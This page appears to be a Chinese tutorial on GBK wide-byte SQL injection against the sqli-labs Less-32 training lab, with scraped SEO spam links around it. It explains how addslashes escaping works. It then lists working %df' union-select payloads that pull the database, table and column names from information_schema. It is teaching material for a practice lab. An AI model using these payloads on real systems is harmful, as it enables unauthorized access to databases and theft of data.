当前位置: 首页 > news >正文

企业建站个人建站源码商品推广与营销的方式

企业建站个人建站源码,商品推广与营销的方式,莱州教研室网站,网站降权 烦文章目录 SQL注入 - 宽字节注入宽字节注入前置知识宽字节靶场实战判断是否存在SQL注入判断位数判显错位判库名判表名判列名 SQL注入 - 宽字节注入 靶场 sqli - labs less-32 宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:G…

文章目录

  • SQL注入 - 宽字节注入
    • 宽字节注入前置知识
    • 宽字节
    • 靶场实战
      • 判断是否存在SQL注入
      • 判断位数
      • 判显错位
      • 判库名
      • 判表名
      • 判列名

SQL注入 - 宽字节注入

靶场 sqli - labs less-32

宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入

宽字节注入前置知识

php 5.4 以下低版本,修改配置文件然后强制执行,使用 magic_quotes_gpc 函数转义

<?php
$a = "select * from admin where id ='$_REQUEST[8]'";
echo $a;
?>

php 5.4 以上高版本,删除掉了这个配置,通过特定函数使用addslashes() 函数转义

<?php
$b = addslashes($_REQUEST[8]);
$a = "select * from admin where id ='$b'";
echo $a;
?>

SQL注入的核心是 闭合引号,注释后面的引号,让我们的输入跳出单双引号

select * from users where id='1' 

魔术引号的核心意义是不让你闭合,通过反斜杠转义你输入的单双引号反斜杠等

绕过方法:
1、寻找不需要闭合的地方,如传参类型为init还是varchar
2、仔细查看作用域($_server)
3、宽字节注入

宽字节

两个单字节可以变为双字节,如:

select * from users where id='1?/''如数据库采用gbk编码方式,?/ 被解释成汉字则,' 会被逃逸出来

靶场实战

判断是否存在SQL注入

?id=1’ and 1=1 ?id=1’ and 1=2 发现被反斜杠转义了

?id=1' and 1=1 --+
?id=1' and 1=2 --+

使用%df 进行宽字节注入绕过,发现存在SQL注入

/ = 5c
%df = df
df5c = 運 (GBK编码字符)?id=1%df' and 1=1 --+
?id=1%df' and 1=2 --+

判断位数

order by 语句可得 位数为3

?id=1%df' order by 4 --+

判显错位

判断可得2,3

?id=-1%df' union select 1,2,3 --+

判库名

判断可得 security

?id=-1%df' union select 1,2,database() --+

判表名

?id=-1%df' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 --+

判列名

?id=-1%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 0,1 --+0x7573657273(16进制) = users
http://www.jinmujx.cn/news/111942.html

相关文章:

  • wordpress小程序二开百度网站排名优化软件
  • 普法网站建设方案第三波疫情将全面大爆发
  • 代理网站是什么互联网营销师报名费
  • 柴沟堡做网站公司关键词优化网站排名
  • 做网站难网站搜索工具
  • 东莞工业品网站建设网络营销渠道可分为哪些
  • 怀化网站建设谷歌关键词搜索排名
  • 怎么做免流网站在线生成网站
  • 中国石化工程建设公司网站广州抖音推广
  • 缅甸网站后缀百度官网首页下载
  • 网页制作与网站建设...可口可乐软文营销案例
  • 上海网站建设价格厨师培训
  • 网站怎么做兼容测试交换链接案例
  • 做竞价网站1000个关键词
  • python做网站表白域名注册新网
  • 深圳宝安网站制作公司百度地图推广电话
  • 网站建设备案 优帮云引流人脉推广软件
  • 阿里云搭建公司网站seo网站建设是什么意思
  • 做h5单页的网站郑州seo管理
  • 营销赚钱网站seo优化的主要内容
  • 成都市建设路小学网站免费下载百度
  • 做的网站浏览的越多越挣钱seo是哪里
  • 网站建设规模与类别惠州seo网站排名
  • 网站自然排名优化最近实时热点事件
  • 有用建站宝盒做网站的吗网站排名优化查询
  • 深圳网站维护服务的公司网络推广网络营销外包
  • 建10个网站seo的优点有哪些
  • 广告推广语seo推广有哪些公司
  • 建立网站需要什么软件做推广哪个平台效果好
  • vs2013 做网站成都排名seo公司